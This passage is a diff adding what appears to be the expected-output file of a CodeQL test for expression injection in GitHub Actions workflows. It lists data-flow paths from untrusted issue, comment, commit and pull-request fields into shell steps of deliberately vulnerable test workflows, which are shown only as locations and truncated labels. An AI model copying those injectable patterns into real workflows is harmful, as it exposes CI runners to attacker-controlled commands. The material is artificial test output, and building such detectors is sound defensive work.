@@ -0,0 +1,227 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... 
_url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... 
iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... 
title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... 
ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... 
iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... 
nch }}' | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | +| .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/workflow_run.yml:11:12:11:75 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/workflow_run.yml:12:12:12:74 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:13:12:13:78 | echo '$ ... ail }}' | semmle.label | echo '$ ... 
ail }}' | +| .github/workflows/workflow_run.yml:14:12:14:77 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/workflow_run.yml:15:12:15:62 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/workflow_run.yml:16:12:16:78 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| action1/action.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +subpaths +#select +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | .github/workflows/comment_issue.yml:7:12:8:48 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. 
| +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:41:12:43:5 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:41:12:43:5 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/cross3.yml:47:12:53:109 | \| | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:47:12:53:109 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. 
| +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. 
| +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... 
bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... 
tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... 
ref }}' | .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo 